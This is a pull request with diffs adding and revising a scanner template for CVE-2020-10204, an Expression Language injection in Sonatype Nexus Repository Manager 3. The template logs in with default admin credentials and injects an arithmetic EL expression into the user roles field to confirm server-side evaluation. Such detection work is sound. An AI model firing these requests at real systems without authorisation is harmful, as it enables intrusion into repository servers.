### PR TITLE
Added CVE-2020-10204 | Sonatype Nexus Repository Manager 3 RCE

### DIFF
--- a/http/cves/2020/CVE-2020-10204.yaml
+++ b/http/cves/2020/CVE-2020-10204.yaml
@@ -12,8 +12,8 @@ info:
     Upgrade to Sonatype Nexus Repository Manager 3.21.2 or later.
   reference:
     - https://www.cve.org/CVERecord?id=CVE-2020-10204
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-10204
     - https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2020-10204
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-10204
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 7.2
@@ -25,46 +25,41 @@ info:
     vendor: sonatype
     product: nexus
     shodan-query: http.component:"Nexus Repository Manager"
+    fofa-query: title="nexus repository manager"
   tags: cve,cve2020,nexus,rce,sonatype,el-injection,intrusive
+
+variables:
+  username: admin
+  password: admin
 
 http:
   - raw:
       - |
         POST /service/rapture/session HTTP/1.1
         Host: {{Hostname}}
-        X-Nexus-UI: true
-        X-Requested-With: XMLHttpRequest
-        Content-Type: application/x-www-form-urlencoded
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
 
-        username=YWRtaW4=&password=YWRtaW4=
+        username={{base64(username)}}&password={{base64(password)}}
+
       - |
         POST /service/extdirect HTTP/1.1
         Host: {{Hostname}}
-        NX-ANTI-CSRF-TOKEN: 0.1234567890123456
+        NX-ANTI-CSRF-TOKEN: 1
         X-Nexus-UI: true
-        X-Requested-With: XMLHttpRequest
         Content-Type: application/json
-        Cookie: NXSESSIONID={{sessid}}; NX-ANTI-CSRF-TOKEN=0.1234567890123456
+        Cookie: NX-ANTI-CSRF-TOKEN=1
 
-        {"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nx-admin$\\B{233*233}"]}],"type":"rpc","tid":11}
-
-    extractors:
-      - type: regex
-        name: sessid
-        part: header
-        internal: true
-        group: 1
-        regex:
-          - 'NXSESSIONID=([a-z0-9-]+)'
+        {"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nx-admin$\\B{3*3333}"]}],"type":"rpc","tid":11}
 
     matchers-condition: and
     matchers:
       - type: word
         part: body
         words:
-          - "nx-adminB54289"
-
-      - type: word
-        part: body
-        words:
+          - "nx-adminB9999"
           - "Missing roles"
+        condition: and
+
+      - type: status
+        status:
+          - 200

--- a/http/cves/2020/CVE-2020-10204.yaml
+++ b/http/cves/2020/CVE-2020-10204.yaml
@@ -11,7 +11,6 @@ info:
   remediation: |
     Upgrade to Sonatype Nexus Repository Manager 3.21.2 or later.
   reference:
-    - https://www.cve.org/CVERecord?id=CVE-2020-10204
     - https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2020-10204
     - https://nvd.nist.gov/vuln/detail/CVE-2020-10204
   classification:
@@ -26,7 +25,7 @@ info:
     product: nexus
     shodan-query: http.component:"Nexus Repository Manager"
     fofa-query: title="nexus repository manager"
-  tags: cve,cve2020,nexus,rce,sonatype,el-injection,intrusive
+  tags: cve,cve2020,nexus,rce,sonatype,el-injection,intrusive,authenticated
 
 variables:
   username: admin

--- a/http/cves/2020/CVE-2020-10204.yaml
+++ b/http/cves/2020/CVE-2020-10204.yaml
@@ -1,0 +1,70 @@
+id: CVE-2020-10204
+
+info:
+  name: Sonatype Nexus Repository Manager 3 - Remote Code Execution
+  author: mmadersbacher
+  severity: high
+  description: |
+    Sonatype Nexus Repository Manager 3 up to and including 3.21.1 is vulnerable to Expression Language injection. An attacker authenticated with an administrative account can inject an EL expression into the user "roles" field of the coreui_User update endpoint, leading to remote code execution. This is a bypass of the fix for CVE-2018-16621.
+  impact: |
+    Remote code execution on the Nexus Repository Manager host.
+  remediation: |
+    Upgrade to Sonatype Nexus Repository Manager 3.21.2 or later.
+  reference:
+    - https://www.cve.org/CVERecord?id=CVE-2020-10204
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-10204
+    - https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2020-10204
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 7.2
+    cve-id: CVE-2020-10204
+    cwe-id: CWE-20
+  metadata:
+    verified: true
+    max-request: 2
+    vendor: sonatype
+    product: nexus
+    shodan-query: http.component:"Nexus Repository Manager"
+  tags: cve,cve2020,nexus,rce,sonatype,el-injection,intrusive
+
+http:
+  - raw:
+      - |
+        POST /service/rapture/session HTTP/1.1
+        Host: {{Hostname}}
+        X-Nexus-UI: true
+        X-Requested-With: XMLHttpRequest
+        Content-Type: application/x-www-form-urlencoded
+
+        username=YWRtaW4=&password=YWRtaW4=
+      - |
+        POST /service/extdirect HTTP/1.1
+        Host: {{Hostname}}
+        NX-ANTI-CSRF-TOKEN: 0.1234567890123456
+        X-Nexus-UI: true
+        X-Requested-With: XMLHttpRequest
+        Content-Type: application/json
+        Cookie: NXSESSIONID={{sessid}}; NX-ANTI-CSRF-TOKEN=0.1234567890123456
+
+        {"action":"coreui_User","method":"update","data":[{"userId":"admin","version":"2","firstName":"admin","lastName":"User","email":"admin@example.org","status":"active","roles":["nx-admin$\\B{233*233}"]}],"type":"rpc","tid":11}
+
+    extractors:
+      - type: regex
+        name: sessid
+        part: header
+        internal: true
+        group: 1
+        regex:
+          - 'NXSESSIONID=([a-z0-9-]+)'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "nx-adminB54289"
+
+      - type: word
+        part: body
+        words:
+          - "Missing roles"


### PR DESCRIPTION
Adds a template for CVE-2020-10204, an Expression Language injection in
Sonatype Nexus Repository Manager 3 up to 3.21.1. An authenticated admin
can inject an EL expression into the user "roles" field of the coreui_User
update endpoint, leading to RCE. Patch bypass of CVE-2018-16621.

The template logs in (default admin:admin), then sends the roles payload
nx-admin$\B{233*233} and matches the evaluated result nx-adminB54289
(233*233) in the response, which proves the expression is evaluated
server-side rather than treated as a literal string.

Verified against the vulhub CVE-2020-10204 environment:
- matches the vulnerable Nexus 3.21.1 instance
- no match against nginx, apache, and example.com

Tagged intrusive: the request updates a user but fails on the invalid role,
so nothing is persisted.

References:
- https://www.cve.org/CVERecord?id=CVE-2020-10204
- https://nvd.nist.gov/vuln/detail/CVE-2020-10204
